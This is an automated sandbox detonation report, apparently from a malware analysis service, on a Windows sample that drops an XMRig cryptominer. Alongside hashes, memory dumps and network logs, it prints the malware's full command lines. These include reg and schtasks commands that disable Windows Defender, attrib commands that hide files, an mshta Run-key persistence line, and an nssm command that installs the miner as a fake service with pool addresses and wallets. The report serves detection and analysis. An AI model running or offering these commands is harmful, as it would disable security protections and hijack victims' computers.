SHA512 d1358b7142ca466a3ad17f09cdc283546aad9ebc454abf06f7673d46e4c5c59280d0bc673b4bdc557e3032d27aa261667de4284e9fc7d46aba64f89da807df3e

C:\Users\Admin\AppData\Local\Temp\is-H7L8E.tmp\b2p.dll

MD5 ab35386487b343e3e82dbd2671ff9dab
SHA1 03591d07aea3309b631a7d3a6e20a92653e199b8
SHA256 c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2
SHA512 b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

memory/2208-152-0x00000000035D0000-0x00000000035DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-H7L8E.tmp\botva2.dll

MD5 67965a5957a61867d661f05ae1f4773e
SHA1 f14c0a4f154dc685bb7c65b2d804a02a0fb2360d
SHA256 450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105
SHA512 c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

C:\Users\Admin\AppData\Local\Temp\is-H7L8E.tmp\botva2.dll

MD5 67965a5957a61867d661f05ae1f4773e
SHA1 f14c0a4f154dc685bb7c65b2d804a02a0fb2360d
SHA256 450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105
SHA512 c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

memory/2208-153-0x0000000075530000-0x0000000075541000-memory.dmp

memory/1264-154-0x0000000000400000-0x0000000000460000-memory.dmp

memory/4872-155-0x0000000005AB0000-0x0000000005B16000-memory.dmp

memory/2280-156-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 22b86c4bdd3a476351ebe051e2af9564
SHA1 10c9928d20a1e272f58fef1a56434deabae68aa4
SHA256 fd37e08f7e809d14f9e73f802ac0a35c6cea8bfb1261504cafc660d306c21c45
SHA512 fd7e047096015472705e8127f66faa50d71f0e527a4d5b708a16f02289778c18ecd7715f35a37cdaa88a8a9c2786b369b0e23e4009be4f93a79ca0675f2ed982

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 22b86c4bdd3a476351ebe051e2af9564
SHA1 10c9928d20a1e272f58fef1a56434deabae68aa4
SHA256 fd37e08f7e809d14f9e73f802ac0a35c6cea8bfb1261504cafc660d306c21c45
SHA512 fd7e047096015472705e8127f66faa50d71f0e527a4d5b708a16f02289778c18ecd7715f35a37cdaa88a8a9c2786b369b0e23e4009be4f93a79ca0675f2ed982

memory/2280-160-0x0000000140000000-0x0000000140CDE000-memory.dmp

memory/2280-159-0x00000000001D0000-0x00000000001E0000-memory.dmp

memory/2280-161-0x00000000004D0000-0x00000000004F0000-memory.dmp

memory/2280-162-0x0000000140000000-0x0000000140CDE000-memory.dmp

memory/2280-163-0x00000000004F0000-0x0000000000510000-memory.dmp

memory/2280-164-0x00000000004F0000-0x0000000000510000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2022-09-07 13:02

Reported

2022-09-07 13:06

Platform

win7-20220812-en

Max time kernel

125s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Perform\7za.exe N/A
N/A N/A C:\Perform\update.exe N/A
N/A N/A C:\Perform\Resources\NSudo.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Perform\nssm.exe N/A
N/A N/A C:\Perform\nssm.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Perform\update.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Windows\System32\WScript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Warn = "MSHTA VbScript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run CreateObject(\"\"Wscript.Shell\"\").RegRead(\"\"HKCU\\v1Elm0D\"\"), 0, False:close\")" C:\Windows\System32\WScript.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\chrome_debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Perform\7za.exe N/A
N/A N/A C:\Perform\nssm.exe N/A
N/A N/A C:\Perform\nssm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Perform\7za.exe N/A
Token: 35 N/A C:\Perform\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Perform\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Perform\7za.exe N/A
Token: 18446744065119617044 N/A C:\Perform\Resources\NSudo.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Perform\update.exe N/A
N/A N/A C:\Perform\update.exe N/A
N/A N/A C:\Perform\update.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Perform\update.exe N/A
N/A N/A C:\Perform\update.exe N/A
N/A N/A C:\Perform\update.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1808 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe C:\Windows\system32\cmd.exe
PID 1808 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe C:\Windows\system32\cmd.exe
PID 1808 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe C:\Windows\system32\cmd.exe
PID 1808 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe C:\Windows\system32\cmd.exe
PID 1736 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1736 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 1704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 1704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 1704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe

"C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2DF.tmp\2E0.tmp\2E1.bat C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Perform\7za.exe

7za.exe x files.7z -aoa -p6H5d75Z8QwgEeQyU

C:\Perform\update.exe

C:\Perform\update.exe

C:\Perform\Resources\NSudo.exe

C:\Perform\Resources\NSudo.exe -U:T -ShowWindowMode:Hide C:\Perform\Resources\Adobe-GenP-2.7

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Perform\up.vbs"

C:\Windows\system32\attrib.exe

attrib +s +h C:\Perform

C:\Windows\system32\attrib.exe

attrib +s +h C:\Perform\nssm.exe

C:\Windows\system32\attrib.exe

attrib +s +h C:\Perform\7za.exe

C:\Perform\nssm.exe

nssm.exe install "Windows Security" "C:\Perform\Defender.exe" "-r 2 -R 2 --donate-level 1 --cpu-max-threads-hint= 70 -o xmrpool.eu:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p 06 -k -o pool.minexmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o monerohash.com:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o pool.hashvault.pro:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o gulf.moneroocean.stream:10064 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o supportxmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmr.crypto-pool.fr:8888 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o vegas-backup.xmrpool.net:5557 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmrpool.eu:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o supportxmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o gulf.moneroocean.stream:10064 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o pool.minexmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k"

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" VbScript:Execute("CreateObject(""Wscript.Shell"").Run CreateObject(""Wscript.Shell"").RegRead(""HKCU\v1Elm0D""), 0, False:close")

C:\Windows\system32\attrib.exe

attrib +s +h C:\Perform\Defender.exe

C:\Perform\nssm.exe

nssm.exe set "Windows Security" Start SERVICE_DELAYED_AUTO_START

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --mute-audio --remote-debugging-port=9222 https://palygamesconsutoria.blogspot.com/

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6e34f50,0x7fef6e34f60,0x7fef6e34f70

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=944,3555585727298338653,5852393778132322891,131072 --headless --headless --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=952 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=944,3555585727298338653,5852393778132322891,131072 --lang=en-US --service-sandbox-type=network --use-gl=swiftshader-webgl --mute-audio --headless --mojo-platform-channel-handle=1120 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --remote-debugging-port=9222 --allow-pre-commit-input --field-trial-handle=944,3555585727298338653,5852393778132322891,131072 --disable-databases --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=1292 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 palygamesconsutoria.blogspot.com udp
NL 172.217.168.225:443 palygamesconsutoria.blogspot.com tcp
US 8.8.8.8:53 resources.blogblog.com udp
US 8.8.8.8:53 www.blogger.com udp
NL 172.217.168.225:443 palygamesconsutoria.blogspot.com udp
NL 172.217.168.233:443 www.blogger.com tcp
NL 172.217.168.233:443 www.blogger.com tcp
US 8.8.8.8:53 themes.googleusercontent.com udp
NL 142.251.39.97:443 themes.googleusercontent.com tcp
NL 172.217.168.233:443 www.blogger.com udp

Files

memory/1808-54-0x0000000076171000-0x0000000076173000-memory.dmp

memory/1736-55-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\2DF.tmp\2E0.tmp\2E1.bat

MD5 55f5a5033d59e83f200f78efd8cf9ffd
SHA1 b153b8f0da50ffc56996bafa0be0610cec8b9d99
SHA256 d7c9417cd55995d45e20bcb9ac046b0f04cf06486d12d689f515af9eaa097041
SHA512 9924e373453ad7b415aa6b505c7ad232294f44d68a3d7f8d68414bfacab11fc4678b4a03ed5d172b7f0eab9ef905a9e16e2d42b58ba62d11d1d1697760faf047

memory/1780-57-0x0000000000000000-mapping.dmp

memory/1420-58-0x0000000000000000-mapping.dmp

memory/1296-59-0x0000000000000000-mapping.dmp

memory/1212-60-0x0000000000000000-mapping.dmp

memory/1768-61-0x0000000000000000-mapping.dmp

memory/1284-62-0x0000000000000000-mapping.dmp

memory/2008-63-0x0000000000000000-mapping.dmp

memory/1408-64-0x0000000000000000-mapping.dmp

memory/1980-65-0x0000000000000000-mapping.dmp

memory/896-66-0x0000000000000000-mapping.dmp

memory/572-67-0x0000000000000000-mapping.dmp

memory/660-68-0x0000000000000000-mapping.dmp

memory/1540-69-0x0000000000000000-mapping.dmp

memory/1944-70-0x0000000000000000-mapping.dmp

memory/904-71-0x0000000000000000-mapping.dmp

memory/600-72-0x0000000000000000-mapping.dmp

memory/672-73-0x0000000000000000-mapping.dmp

memory/1704-74-0x0000000000000000-mapping.dmp

memory/1012-75-0x0000000000000000-mapping.dmp

memory/876-76-0x0000000000000000-mapping.dmp

memory/1836-77-0x0000000000000000-mapping.dmp

memory/1380-78-0x0000000000000000-mapping.dmp

memory/1972-79-0x0000000000000000-mapping.dmp

memory/1208-80-0x0000000000000000-mapping.dmp

memory/1724-81-0x0000000000000000-mapping.dmp

memory/1180-82-0x0000000000000000-mapping.dmp

memory/1848-83-0x0000000000000000-mapping.dmp

memory/1524-84-0x0000000000000000-mapping.dmp

memory/1652-85-0x0000000000000000-mapping.dmp

memory/744-86-0x0000000000000000-mapping.dmp

memory/1152-87-0x0000000000000000-mapping.dmp

memory/1556-88-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\files.7z

MD5 6380cb936d9229799750c4416ad99a81
